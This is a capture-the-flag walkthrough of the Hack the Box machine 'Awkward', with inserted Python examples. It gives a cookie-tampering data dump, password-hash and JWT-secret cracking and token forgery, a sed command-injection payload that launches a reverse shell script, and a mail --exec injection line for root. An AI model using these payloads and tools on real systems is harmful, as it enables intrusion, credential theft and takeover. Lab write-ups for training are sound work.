
Hack the Box: AWKWARD

  • Writer: Rohan A G
  • Sep 25, 2024
  • 6 min read

Machine difficulty: Medium

Setting up the environment

Refer to the blog on the machine Meow to configure and connect to the HTB VPN.

 

Cracking AWKWARD

STEP 1: Launch the machine

In order to use the machine we must first spawn an instance of it, and we must be connected to the VPN before the machine can be spawned. If you're unsure where to begin, take a look at my Meow walkthrough, where I already discussed the topic. Once you have connected and spawned the machine you will be given its IP address.

 

STEP 2: Check its status

We can use ping to check that the machine answers our ICMP echo requests, which confirms we can reach it. From the terminal, run ping followed by the machine's IP address.

 

STEP 3: Enumeration

 

Using nmap we find that ports 22 (SSH) and 80 (HTTP) are open. Trying default passwords against SSH gives no results. Opening port 80 in the browser redirects to the hostname http://hat-valley.htb, so add it to /etc/hosts before the site will load: run sudo vim /etc/hosts, add a line with the machine's IP followed by hat-valley.htb, and save the file.


Access the website by entering the address and you will be redirected to the page shown below:

The website seems to have no input fields. Let's enumerate directories with dirsearch and see what we can find.


 

We discovered a few intriguing directories that might disclose sensitive data. Another way to go about this is to read the application's source code; if it is minified or messy, beautifier.io makes it easier to read. One of the files found is app.js. Let's examine the /js directory in more detail and list everything in it.


Using ffuf we fuzz for subdomains of hat-valley.htb.

We observe that the store subdomain responds with a successful status code.

Add store.hat-valley.htb to your /etc/hosts file as well. Navigating to it, it appears we will need credentials first:


 

After enumerating directories and subdomains, let's take a closer look at what happens behind the scenes when we use the website. Open Burp Suite's proxied browser and go to hat-valley.htb. On the very first visit we can see something intriguing right away in the request sent to the server:

 

What happens if we change the cookie value from guest to admin? We can do this with a Burp Suite Match and Replace rule, which rewrites the cookie automatically on every request, or simply by editing the value and resending the request.

 

We can now browse to hat-valley.htb/staff-details with the new cookie. The image below shows the staff-details page before the cookie is edited.

After changing the cookie from guest to admin, the JSON response contains the following:


 

It appears that we have the full names, emails and phone numbers of Hat Valley employees, in addition to their usernames and password hashes. An attacker should never have access to this information. Note that the system administrator is listed as "Bean Hill."

Before we can attempt to crack these hashes we need to identify the hashing algorithm. The hashes are 64 hexadecimal characters, which is consistent with SHA-256; a hash identifier, hashcat (mode 1400) or an online hash lookup (which I used) confirms that the passwords are hashed with SHA256.

 

As seen above we obtain the password for the user Christopher Jones. Let's enter these credentials on the store login page.

And boom!! We’re in as Christopher.
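The identification-then-dictionary-attack step above can be scripted for a whole dump at once. The following is an added example, not code from the original post: it takes a staff-details style JSON dump, recognises bare hex digests by length (the same reasoning as "64 hex characters, so SHA-256") and runs a wordlist against each one. The dump, the users and the wordlist are constructed here and are not the box's real data.

```python
import hashlib
import json

# Constructed sample modelled on the staff-details JSON dump; these are NOT the
# box's real users or hashes. The hashes are SHA-256 digests computed here.
SAMPLE_DUMP = json.dumps([
    {"user_id": 1, "username": "christopher.jones", "fullname": "Christopher Jones",
     "password": hashlib.sha256(b"winter2024").hexdigest()},
    {"user_id": 2, "username": "bean.hill", "fullname": "Bean Hill",
     "password": hashlib.sha256(b"not-in-any-wordlist").hexdigest()},
])

# Constructed stand-in for a real wordlist such as rockyou.txt.
WORDLIST = ["password", "letmein", "hatvalley", "winter2024", "summer2023"]

# Unsalted hex digests are recognisable by length alone; map length to hashlib name.
HEX_LENGTH_TO_ALGO = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}


def identify_hash(digest: str):
    """Return the likely hashlib algorithm name for a bare hex digest, or None."""
    digest = digest.strip().lower()
    if not digest or any(c not in "0123456789abcdef" for c in digest):
        return None
    return HEX_LENGTH_TO_ALGO.get(len(digest))


def crack_hash(digest: str, wordlist, algo: str):
    """Dictionary attack: hash each candidate with `algo` and compare to the target."""
    target = digest.strip().lower()
    for candidate in wordlist:
        if hashlib.new(algo, candidate.encode()).hexdigest() == target:
            return candidate
    return None


def crack_dump(dump_json: str, wordlist):
    """Identify and crack every password hash in a staff-details style JSON dump.

    Returns {username: plaintext-or-None}. Unrecognised formats are left as None
    rather than guessed, so the caller can see what still needs another tool.
    """
    results = {}
    for entry in json.loads(dump_json):
        algo = identify_hash(entry.get("password", ""))
        if algo is None:
            results[entry["username"]] = None
            continue
        results[entry["username"]] = crack_hash(entry["password"], wordlist, algo)
    return results


if __name__ == "__main__":
    for user, pw in crack_dump(SAMPLE_DUMP, WORDLIST).items():
        print(f"{user}: {pw if pw else '<not cracked>'}")
```

Length-based identification only works for bare, unsalted digests; a salted or iterated scheme (bcrypt, sha512crypt) needs a proper hash identifier and a matching hashcat mode, which is why the function returns None instead of guessing.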

 

STEP 4: Gaining Foothold

Looking around the dashboard, we see a form for requesting time off, staff information, website stats and a button that refreshes the online store status. Now that we are logged in a session cookie has been issued, which we can inspect with Burp Suite:

 

To make the request readable, send it to Burp's Decoder.

The request, as we observe, references store.hat-valley.htb, the same subdomain we discovered during enumeration. This subdomain looks like it will be significant.

Let's check whether this subdomain exposes any further services or ports:

Three ports are open: 80 is HTTP and 8080 is being used by Burp Suite, so let's see what is listening on 3002. Navigate to the URL below.



 


This box must take its name from the vulnerable awk command that runs when /api/all-leave is queried, according to the description of that endpoint:

The awk command is passed the user variable unescaped. We can abuse this by controlling the value, for example pointing it at a local file: if we set user to /etc/passwd we should be able to read that file. The value of user comes from the username claim in the JWT, so to forge a token with a username of our choosing we need the JWT signing secret. Let's log in at hat-valley.htb/dashboard again and intercept the traffic in Burp Suite to capture the token from the cookie:

 



The signing secret can be recovered by converting the token with jwt2john.py and running John the Ripper against a wordlist. The demonstration is given below:

Now that we have cracked the secret we can craft our own token, with the username set to /etc/passwd, using the website jwt.io.

The forged token is shown below:

We can now send the forged cookie with curl, which lets us set the Cookie header on a request to /api/all-leave from the command line:
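The whole chain from the captured cookie to the forged one (crack the HS256 secret, rewrite the username claim, re-sign) can be done in a few lines without jwt.io. This is an added example, not code from the original post: the secret "hatvalley", the wordlist, the claim name "username" and the captured token are all constructed assumptions; check the real token's claim names in jwt.io before reusing it.

```python
import base64
import hashlib
import hmac
import json


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(claims: dict, secret: str) -> str:
    """Build a compact HS256 JWT the same way jwt.io does."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret.encode(), f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(sig)}"


def verify_hs256(token: str, secret: str) -> bool:
    """Recompute the HMAC over header.body and compare in constant time."""
    try:
        header, body, sig = token.split(".")
    except ValueError:
        return False
    expected = hmac.new(secret.encode(), f"{header}.{body}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(sig))


def decode_claims(token: str) -> dict:
    return json.loads(b64url_decode(token.split(".")[1]))


def crack_secret(token: str, wordlist):
    """What jwt2john + John do: try candidate secrets until the signature verifies."""
    for candidate in wordlist:
        if verify_hs256(token, candidate):
            return candidate
    return None


def forge_token(captured: str, wordlist, username: str = "/etc/passwd"):
    """Crack the secret from a captured token, then re-sign it with an injected username."""
    secret = crack_secret(captured, wordlist)
    if secret is None:
        return None
    claims = decode_claims(captured)
    claims["username"] = username   # assumed claim name; confirm against the real token
    return sign_hs256(claims, secret)


# Constructed stand-ins: secret, wordlist and captured token are made up for this example.
EXAMPLE_SECRET = "hatvalley"
CAPTURED_TOKEN = sign_hs256({"username": "christopher.jones", "iat": 1700000000}, EXAMPLE_SECRET)
WORDLIST = ["password", "secret", "hatvalley", "letmein"]

if __name__ == "__main__":
    forged = forge_token(CAPTURED_TOKEN, WORDLIST)
    print("secret:", crack_secret(CAPTURED_TOKEN, WORDLIST))
    print("forged:", forged)
    print("claims:", decode_claims(forged))
```

The forged value goes into the same cookie the server set, passed to curl with the Cookie header; the server will accept it because the signature is valid under its own secret. This only works because the secret was weak enough to be in a wordlist, which is the point of running jwt2john against it in the first place.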

 


 


As seen above, the output reveals a tar.gz archive containing various files. Let's download it with curl and extract it with tar. The syntax is given below.

On extracting it we find /config/xpad/.

In the highlighted file above we find something very interesting:

These look like a username and a password. Our initial nmap scan showed SSH running on port 22, so let's try authenticating with the credentials we just found.

And bingo!! We're in. Run ls and one of the files listed is user.txt. That is our first flag, the user flag.

STEP 5: Privilege escalation

Before getting started, let's do a little more recon on the store by identifying the technologies it uses. I used Wappalyzer, but feel free to use any tool you know.

From the image above we know that the authorization requests are handled by an nginx server. Let's see if we can find anything important in the nginx configuration.

Oof! We find both the username admin and a hashed password. Before trying these credentials, note that the password is hashed. I went ahead with Bean's password found earlier and, by the grace of the cyber gods, it was it! But the password is an MD5 hashed value that could also be cracked with a password cracking tool.

As you might expect, this is Hat Valley's online shop. We can find the site's source files from our shell under /var/www/store. Reading README.md, we learn that files are kept offline under /product-details and /cart, and that the products header is used to verify products.

List the items in that directory. One of them is cart_actions.php; run cat cart_actions.php to read its contents.

A sed command is used to remove an item from the cart file. Perhaps we can exploit this for remote code execution. To see how it works, add one item to the cart:

The cart file has been updated with an entry for the item we added.

Let's create a reverse shell script in /tmp and make it executable.

Writing the file where the application keeps its cart data would need privileges we currently don't have, so instead we create a temporary file in /tmp that mimics a cart item, give it the required parameters, and use it in place of the cart item.


Start a netcat listener and edit the item ID in Burp Suite:

Replace the original request body:



item_id=1' -e "1e /tmp/rev.sh" /tmp/rev.sh '&item_name=Yellow Beanie&item_brand=Good Doggo&item_price=$39.90

with:

item=1'+-e+"1e+/tmp/rev.sh"+/tmp/rev.sh+'&user=3f0f-a427-a94-587c&action=delete_item
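Why that item ID works: the single quote closes the sed expression the script wraps around the ID, so the rest of the payload becomes extra sed arguments. The block below is an added example, not the page's or the box's code; the shape of the vulnerable command (an item ID interpolated into a single-quoted sed expression and run through a shell) and the cart path are assumptions modelled on what the payload implies. It splits the resulting command line the way a shell would, shows which strings sed would treat as scripts versus input files, and contrasts it with a handler that validates the ID and builds argv directly. The payload is the decoded form of the request body above (the `+` signs are URL-encoded spaces).

```python
import re
import shlex

# Assumed path of the per-user cart files; not taken from the page.
CART_DIR = "/var/www/store/cart"


def build_command_unsafe(item_id: str, user: str) -> list:
    """Assumed vulnerable pattern: interpolate untrusted input into a shell string,
    then split it exactly as sh would before exec'ing sed."""
    command = f"sed -i '/item_id={item_id}/d' {CART_DIR}/{user}.csv"
    return shlex.split(command)


def build_command_safe(item_id: str, user: str) -> list:
    """Hardened version: allow-list both inputs and build argv with no shell at all."""
    if not re.fullmatch(r"[0-9]+", item_id):
        raise ValueError("item_id must be numeric")
    if not re.fullmatch(r"[0-9a-f-]+", user):
        raise ValueError("bad user id")
    return ["sed", "-i", f"/item_id={item_id}/d", f"{CART_DIR}/{user}.csv"]


def explain(argv: list) -> dict:
    """Summarise how GNU sed reads argv: -e values are scripts, other non-option
    arguments are input files; with no -e, the first non-option argument is the script."""
    scripts, files = [], []
    i = 1
    while i < len(argv):
        if argv[i] == "-e":
            scripts.append(argv[i + 1])
            i += 2
            continue
        if argv[i].startswith("-"):
            i += 1
            continue
        files.append(argv[i])
        i += 1
    if not scripts and files:
        scripts.append(files.pop(0))
    return {"scripts": scripts, "files": files}


# The page's payload, URL-decoded, and the user id from the delete_item request.
PAYLOAD = "1' -e \"1e /tmp/rev.sh\" /tmp/rev.sh '"
USER = "3f0f-a427-a94-587c"

if __name__ == "__main__":
    print("injected :", explain(build_command_unsafe(PAYLOAD, USER)))
    print("hardened :", explain(build_command_safe("1", USER)))
    try:
        build_command_safe(PAYLOAD, USER)
    except ValueError as err:
        print("rejected :", err)
```

With the injected ID the only script sed sees is `1e /tmp/rev.sh`, and `/tmp/rev.sh` is also one of its input files. GNU sed's `e` command runs its argument as a shell command when the addressed line is reached, and because `-i` processes each file separately, line 1 of /tmp/rev.sh is enough to trigger it; the original `/item_id=1` and `/d` fragments are demoted to (non-existent) file names that sed merely complains about. In the hardened builder the same payload never reaches sed: the numeric allow-list rejects it, and even a valid ID is passed as a single argv element rather than through a shell.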


 

If this succeeds we should get a shell:

You should now be on the server as www-data. Digging around, we come across an interesting file, leave_requests.csv, in the /var/www/private directory.


We can take advantage of this by appending a line to leave_requests.csv that causes our shell script to be executed when the file is processed.

Using our shell file, append the following line, which injects an --exec option into the mail command that handles the file:


echo '" --exec="\!/tmp/rev.sh"' >> leave_requests.csv


Type in sudo netcat -lvnp 9001 and wait for the connection back.

Navigate to the root directory:

And finally we have pwned Awkward with the root flag!!

 
 
 
